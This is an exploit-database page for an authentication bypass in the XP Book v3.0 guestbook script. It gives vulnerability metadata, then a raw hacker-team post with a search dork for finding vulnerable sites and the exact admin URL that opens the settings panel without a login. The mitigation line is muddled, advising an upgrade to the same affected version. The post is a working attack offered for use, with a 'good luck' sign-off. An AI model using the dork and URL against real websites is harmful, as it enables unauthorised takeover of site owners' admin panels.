header-logo
Suggest Exploit
vendor:
XP Book
by:
wlhaan hacker
7.5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: XP Book
Affected Version From: 3
Affected Version To: 3
Patch Exists: YES
Related CWE: N/A
CPE: a:kuwaitiphp:xp_book:3.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2003

XP Book v3.0) login Admin Exploit)

This exploit allows an attacker to bypass authentication and gain access to the admin panel of XP Book v3.0. The exploit is achieved by accessing the template/admin_bady.html?action=setting page.

Mitigation:

Upgrade to the latest version of XP Book v3.0.
Source

Exploit-DB raw data:

                          ||          ||   | ||
                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,
                  ( :   /    (_)    /           (   .
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|     _                   __           __       __          ______     |
|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
|                  \ \____/ >> team wlhaan hacker                      |
|                   \/___/                                             |
|                                                                      |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|


_____________________________________________________
XP Book v3.0) login Admin Exploit)

#####################################################
# [+] Author : wlhaan hacker #
# [+] Email : iit@HoTMaiL.coM #
# [+] Site : www.sa-hacker.com/vb #
# [+] Team : wlhaan TeaM #
# [+] Dork : Powered by: XP Book v3.0 #
# [+] or : "XP Book v3.0 Coded By: Kuwaitiphp © 2003" #
#####################################################

[+] download : http://www.traidnt.net/vb/attachment.php?s=464133a8cff5c8539cd31d913a6d0287&attachmentid=2775&d=1108305980


The exploit :

 "template/admin_bady.html?action=setting"

Get now in :

http://localhost/path/template/admin_bady.html?action=setting


and good luck :D

Thanks to : shooq hacker ..